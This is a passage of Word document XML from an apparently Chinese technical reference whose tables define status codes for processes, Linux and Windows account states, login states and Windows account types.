          <w:p w14:paraId="14E9DFB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B3730A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>T</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F51C4EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>暂停状态或跟踪状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="49DDEE87" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B7722A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5478B462" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Z</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35AD0678" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>退出状态，进程成为僵尸进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62148F14" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="519" w:name="_Toc115166332"/>
      <w:bookmarkStart w:id="520" w:name="linux账号状态"/>
      <w:bookmarkEnd w:id="518"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>账号状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="519"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1564"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="6769BBD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9C1CA88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A839C33" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="160C0D5F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6D09113C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E5922FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>accountStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CA040F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AE923A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>禁用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="59078C5F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FE70FA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>accountStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E504007" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57B51586" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>启用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11A0F86C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="521" w:name="_Toc115166333"/>
      <w:bookmarkStart w:id="522" w:name="windows账号状态"/>
      <w:bookmarkEnd w:id="520"/>
      <w:r>
        <w:t>windows账号状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="521"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1564"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4760852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7670DE4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="778CC8AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EFBA7C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="375AFC39" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CE075B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>accountStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A0FE94F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F7645A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>启用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3DD71599" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="388AE768" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>accountStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43DC4C4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75685022" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>锁定</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="50B7146B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F646220" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>accountStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="491553C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="523B8701" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>禁用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A972BA8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="523" w:name="_Toc115166334"/>
      <w:bookmarkStart w:id="524" w:name="linux登录状态"/>
      <w:bookmarkEnd w:id="522"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>登录状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="523"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1290"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1531"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1D85A9A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4729D41" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C079C8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B0DDA8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="76FCEBB0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BC9B353" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73F13A36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08531944" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>不可登入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4D52A49D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FEAC2A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C3AB3D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="031164BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>不可交互登入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7BAEF34D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="768201D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="748D67AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FCF3847" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>可交互登入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="59A4DD2C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01B8C664" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="289F8FB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C5951D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>key&amp;pwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>登陆</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24C5D2CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="525" w:name="_Toc115166335"/>
      <w:bookmarkStart w:id="526" w:name="windows账号类型"/>
      <w:bookmarkEnd w:id="524"/>
      <w:r>
        <w:t>windows账号类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="525"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="632"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1531"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="08D9F00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434D8F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A73608F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="074BFA9C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="58818A6D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BDA8068" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="787CE846" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AE7C51B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="09B31F95" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CA86DE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="648D5637" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D315C6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="28F1A030" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37CF5F23" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29818A8C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69ACE59D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>别名组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5D3E360D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="589B1758" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50DB76DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E6BEBB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>WellKonwn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="053BF5B0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36AC6C83" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FCBA4A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12774919" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>已删除用户组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="028EEB4C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="684D1DDA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="717F27E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3629F453" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>未知类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FE57F9A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="527" w:name="_Toc115166336"/>
      <w:bookmarkStart w:id="528" w:name="linux账户登录方式"/>
      <w:bookmarkEnd w:id="526"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>账户登录方式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="527"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1958"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1531"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="032864F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25D0B3D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
